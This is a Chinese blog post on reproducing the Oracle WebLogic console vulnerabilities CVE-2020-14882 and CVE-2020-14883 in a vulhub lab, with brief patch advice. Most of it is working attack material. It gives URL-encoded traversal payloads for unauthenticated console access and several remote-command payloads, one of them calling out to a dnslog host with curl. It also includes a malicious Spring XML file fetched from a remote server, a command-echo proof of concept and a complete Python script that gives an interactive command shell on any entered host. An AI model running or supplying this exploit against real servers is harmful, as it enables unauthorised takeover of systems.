CVE-2020-14882 未授权访问 CVE-2020-148823 RCE 含利用脚本

最新推荐文章于 2024-07-10 10:00:00 发布
置顶 最新推荐文章于 2024-07-10 10:00:00 发布
阅读量667 收藏 1
点赞数
分类专栏: web漏洞复现 文章标签: weblogic 安全漏洞 脚本语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kksunkanghui/article/details/109562069
版权
该博客详细介绍了CVE-2020-14882漏洞,包括漏洞描述、影响版本、复现过程,特别是针对RCE(远程命令执行)的多种方法,如无回显配合dnslog的利用,以及可回显的POC。同时,提供了修复方案和漏洞利用脚本,帮助读者理解并防范此安全威胁。
摘要由CSDN通过智能技术生成

目录

0x01漏洞描述

0x02影响版本

0x03漏洞复现

1.未授权访问(低权限)

2.RCE(远程命令执行)无回显 可以搭配dnslog

3.使用dnslog(RCE)

4.被动访问XML文件方式(RCE)

5.可回显的POC(RCE)

0x04修复方案

0x05漏洞利用脚本:

0x06脚本测试图:

0x01漏洞描述

 
2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882 ,漏洞等级:严重 ,漏洞评分:9.8 。
远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。
 
 

0x02影响版本

Oracle WeblogicServer 10.3.6.0.0
Oracle WeblogicServer 12.1.3.0.0
Oracle WeblogicServer 12.2.1.3.0
Oracle WeblogicServer 12.2.1.4.0
Oracle WeblogicServer 14.1.1.0.0
 

0x03漏洞复现

 

环境搭建:使用vulhub搭建环境
测试版本:administration console 12c 12.2.1.3.0

  • 1.未授权访问(低权限)

  • payload(GET) 
/console/css/%252e%252e%252fconsole.portal

 

  • 截图:
 

  • 2.RCE(远程命令执行)无回显 可以搭配dnslog

  • payload:(GET)
  • dnslog    
   
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/sunsanhui');")

 

 
 
 
 
docker ps  #查看docker信息
 
docker exec -it 300eba524103 /bin/bash    #进入docker
 
 
cd /tmp/    #进入docker的tmp目录查看是否命令执行成功
 
 

 

  • 3.使用dnslog(RCE)

  • paylaod:
  
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl%20XXXXX.ceye.io');") 

 

 

  • 4.被动访问XML文件方式(RCE)

  • 缺点:需要Weblogic的服务器能够访问到恶意XML
  • payload
首先构造恶意的XML文件 
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

 

例如将其放在了 http://example.com/rce.xml
  
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")

 

5.可回显的POC(RCE)

  
GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1
Host: 192.168.222.135:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
cmd: id

 

 

0x04修复方案

 

1、建议用户及时将 Weblogic 后台/console/console.portal 对外的访问权限暂时关闭。
2、此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。
注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。
 

0x05漏洞利用脚本:

源码 基于py3.8.1 
import requests
import re
import http.client
import urllib3

name = '''
   _______      ________    ___   ___ ___   ___        __ _  _   ___   ___ ____  
  / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | || | / _ \ / _ \___ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | || || (_) | (_) |__) |
 | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |__   _> _ < > _ <|__ < 
 | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |  | || (_) | (_) |__) |
  \_____|   \/   |______|  |____|\___/____|\___/       |_|  |_| \___/ \___/____/ 
                                                             DESIGN BY Skhcats

'''

print(name)

urllib3.disable_warnings()
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'


def send(host, poc, cmd):
    text = host + poc
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36'
    }
    header['cmd'] = cmd
    try:
        res = requests.get(text, verify=False, headers=header, stream=True,timeout=5)
        if res.status_code == requests.codes.ok:
            res.encoding = 'utf-8'
            if 'html' in res.text:
                return '目标主机可能不存在此命令'
            else:
                return res.text
        else:
            return '状态码:'+res.status_code
    except Exception as e:
        print(e)
        print('致命错误/目标主机可能不存在此漏洞')
        exit(0)


if __name__ == '__main__':
    host = re.findall(r'https?://.+/',str(input("host(start with 'http://' or 'https://'):"))+r'/')[0]
    poc = r'''/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')'''
    while True:
        cmd = input('cmd&> ')
        res = send(host, poc, cmd)
        print(res)

 

 

 

0x06脚本测试图:

 
 
 
逗逼撞地球
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic授权访问漏洞复现(CVE-2020-14882
Armandhe的博客
06-07 5084
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 7020
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
Weblogic 管理控制台授权远程命令执行漏洞(CVE-2020-14882CVE-2020-14883)
最新发布
m0_68045701的博客
07-10 1810
2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883。CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如。访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码。
CVE-2020-14882~14883(Weblogic RCE)
include_heqile的博客
11-23 473
https://mp.weixin.qq.com/s?__biz=MzkzNTA0NzgyMA==&mid=2247483787&idx=1&sn=9406a10d2f78d20c1dc57b0cf98618db&chksm=c2b2a668f5c52f7e386c84f9e22379e7d4a3e7ee470e07427c4327555d98af7d7f5c103bf353&token=517092499&lang=zh_CN#rd
CVE-2020-14882 Oracle WebLogic远程命令执行漏洞
dearya123的博客
06-28 2797
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server Console 多版本存在安全漏洞,该漏洞使经身份验证的攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server,受影响版本如下: 10.3.6.0.0版本, 12.1.3.0.0版本, 12.2.1.3.0版本,
CVE-2020-14882 WebLogic远程代码执行漏洞
星落的博客
12-03 1506
目录 简介 实验环境 实验环境部署 漏洞复现 POC代码 简介 Weblogic Server是美国Oracle公司主要的产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场主要的Java应用服务器软件之一。 利用该漏洞,远程攻击者可以通过发送恶意的HTTP GET请求。成功利用此漏洞的攻击者可以在经身份验证的情况下控制 WebLogic Server COnsole,并执行任意代码。 实验环境 vulhub weblogic12.2.
CVE-2020-0796-RCE-POC:CVE-2020-0796远程执行代码POC
03-19
CVE-2020-0796远程执行代码POC (c)2020 ZecOps,Inc.- ://www.zecops.com-查找攻击者的错误CVE-2020-0796 /“ SMBGhost”的远程代码执行POC预期结果:具有系统访问权限的反向Shell。仅用于公司环境中的教育和测试...
CVE-2020-2555:CVE-2020-2555 Python POC
04-15
标题中的"CVE-2020-2555:CVE-2020-2555 Python POC"表明这是一个关于Python编程语言的安全漏洞利用代码,具体来说是针对CVE-2020-2555漏洞的Proof of Concept(概念验证)。CVE(Common Vulnerabilities and ...
CVE-2020-0796 检测及利用工具1
08-03
标题提及的"CVE-2020-0796"是2020年发现的一个严重安全漏洞,被称作"SMBGhost"或"Windows SMBv3 RCE"漏洞。该漏洞存在于Microsoft的Server Message Block (SMB) v3协议中,允许远程攻击者在打补丁的系统上执行任意...
CVE-2020-10977:Gitlab v12.4.0-8.1 RCE
05-07
亚搏体育app v12.4.0-12.8.1 RCE 完全基于 ,这对我不起作用,HTML解析的内容似乎很麻烦,因此我将其重写为js。...然后使用以下命令运行此脚本: TARGET_URI= " ...可以使用TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080...
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
CVE-2020-14882 WebLogic远程代码执行漏洞复现
热门推荐
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在经身份验证的情况下控制 We
CVE-2020-14882_ALL综合利用工具
网络安全。
12-07 2510
简介 CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。 需要模块:requests、http.client (工具仅用于授权的安全测试,请勿用于非法使用,违规行为与作者无关。) 命令回显模块已知成功版本:12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 工具地址:https://github.com/GGyao/CVE-2020-14882_ALL(喜欢的点个star喔) 选项 功能一:命令回显 python3 CVE-20
CVE-2020-14882 weblogic授权远程命令执行漏洞
栉风沐雪的博客
02-22 4388
Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用利用此漏洞可在经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
CVE-2020-14882Weblogic Console 权限绕过深入解析
爱国小白帽
11-05 6246
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-110501 报告来源:360CERT 报告作者:Hu3sky 更新日期:2020-11-05 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC 已经公开,相关漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重 ,漏洞评分:9.8 。 远程攻击者可以构
CVE-2020-14882weblogic 授权命令执行漏洞验证及修复
weixin_38896449的博客
12-02 3676
weblogic 授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 在Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update)中,包一个存在于Weblogic Console中的高危远程代码执行漏洞CVE-2020-14882经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 2.影响版本 Oracle Web
渗透测试系列:weblogic文件路径确认(cve-2020-14882
weixin_54626591的博客
01-12 1116
weblogic文件路径确认(cve-2020-14882
探索CVE-2020-14882:一款全面的安全研究工具
gitblog_00093的博客
03-30 342
探索CVE-2020-14882:一款全面的安全研究工具 项目地址:https://gitcode.com/GGyao/CVE-2020-14882_ALL 在网络安全的世界里,了解并应对漏洞是至关重要的。GitCode上的CVE-2020-14882_ALL项目是一个专注于研究和解决CVE-2020-14882漏洞的开源平台。该项目旨在帮助开发者、安全研究人员和系统管理员深入理解这一特定的安全威...
CVE-2020-14882&14883漏洞复现
m0_52089634的博客
01-03 1557
CVE漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值